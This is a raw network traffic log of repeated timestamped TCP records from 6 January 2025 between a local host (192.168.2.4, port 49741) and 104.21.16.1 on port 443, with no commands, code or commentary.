                                                                                                  Jan 6, 2025 13:55:22.979224920 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.979237080 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.979276896 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.996637106 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.996654987 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.996788025 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.996788025 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.996798038 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.996843100 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.996881962 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.996898890 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.996938944 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.996952057 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.996958017 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.996982098 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.997287989 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.997307062 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.997354984 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.997360945 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.997386932 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.034256935 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.034276009 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.034332991 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.034348965 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.034374952 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.036607027 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.036631107 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.036662102 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.036667109 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.036694050 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.036847115 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.036861897 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.036899090 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.036905050 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.036938906 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.037188053 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.037205935 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.037241936 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.037247896 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.037275076 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.067569017 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.067584038 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.067631960 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.067641973 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.067663908 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.085087061 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.085105896 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.085140944 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.085150003 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.085161924 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.085530996 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.085545063 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.085583925 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.085591078 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.085612059 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.085721970 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.085740089 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.085768938 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.085776091 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.085802078 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.122631073 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.122652054 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.122725964 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.122734070 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.125076056 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.125096083 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.125230074 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.125230074 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.125236034 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.125390053 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.125403881 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.125446081 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.125452042 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.125910044 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.125926971 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.125958920 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.125967026 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.125992060 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.156058073 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.156073093 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.156220913 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.156229019 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.173508883 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.173528910 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.173665047 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.173665047 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.173672915 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.173890114 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.173902988 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.173945904 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.173952103 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.174226046 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.174243927 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.174279928 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.174285889 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.174297094 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.211164951 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.211183071 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.211344957 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.211355925 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.213725090 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.213743925 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.213783026 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.213788986 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.213816881 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.213828087 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.213840961 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.213891029 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.213897943 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.214143038 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.214160919 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.214196920 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.214202881 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.214225054 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.244642973 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.244657040 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.244769096 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.244776964 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.262027979 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.262044907 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.262156963 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.262165070 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.262362003 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.262373924 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.262522936 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.262530088 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.262670994 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.262686968 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.262727976 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.262732983 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.262761116 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.299639940 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.299659014 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.299741983 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.299750090 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.302052021 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.302071095 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.302109003 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.302114010 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.302139044 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.302414894 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.302428961 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.302481890 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.302488089 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.302757978 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.302776098 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.302813053 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.302819967 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.302843094 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.333050013 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.333067894 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.333230972 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.333240986 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.350495100 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.350512981 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.350759983 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.350768089 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.350894928 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.350909948 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.350967884 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.350975037 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.351140976 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.351157904 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.351200104 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.351206064 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.351234913 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.388101101 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.388114929 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.388266087 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.388276100 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.390537024 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.390553951 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.390614986 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.390621901 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.390911102 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.390923023 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.390984058 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.390990973 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.391376972 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.391392946 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.391431093 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.391437054 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.391448021 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.421571970 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.421586037 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.421648979 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.421663046 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.421674013 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.438955069 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.438972950 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.439018965 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.439027071 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.439057112 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.439284086 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.439296961 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.439335108 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.439342022 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.439374924 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.439652920 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.439671040 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.439707994 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.439713955 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.439734936 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.476739883 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.476753950 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.476833105 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.476840973 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.478948116 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.478965998 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.479006052 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.479011059 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.479023933 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.479260921 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.479274988 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.479341984 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.479347944 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.479731083 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.479749918 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.479787111 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.479793072 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.479810953 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.510001898 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.510018110 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.510092020 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.510104895 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.527476072 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.527493954 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.527534008 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.527540922 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.527568102 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.527762890 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.527776957 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.527816057 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.527822018 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.527848959 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.528089046 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.528105021 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.528146982 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.528152943 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.528175116 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.565324068 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.565340996 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.565417051 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.565424919 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.567576885 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.567595959 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.567650080 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.567656994 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.567704916 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.567867041 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.567883015 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.567936897 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.567941904 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.568058014 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.568075895 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.568111897 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.568116903 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.568141937 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.599339008 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.599355936 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.599426985 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.599433899 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.616852999 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.616873980 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.616925955 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.616934061 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.616961956 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.617306948 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.617320061 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.617364883 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.617371082 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.617396116 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.618088961 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.618108988 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.618149042 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.618154049 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.618175983 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.653784990 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.653801918 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.653856039 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.653862953 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.653889894 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.656156063 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.656174898 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.656213045 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.656219959 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.656230927 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.656450033 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.656465054 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.656503916 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.656508923 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.656541109 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.656910896 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.656929970 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.656995058 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.657001019 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.687164068 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.687181950 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.687247038 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.687259912 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.687293053 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.704519033 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.704536915 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.704586983 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.704595089 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.704622984 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.705027103 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.705039978 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.705086946 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.705092907 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.705111980 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.705123901 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.705142021 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.705173016 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.705178022 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.705209970 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:23.742465973 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.742479086 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:23.742557049 CET49741443192.168.2.4104.21.16.1
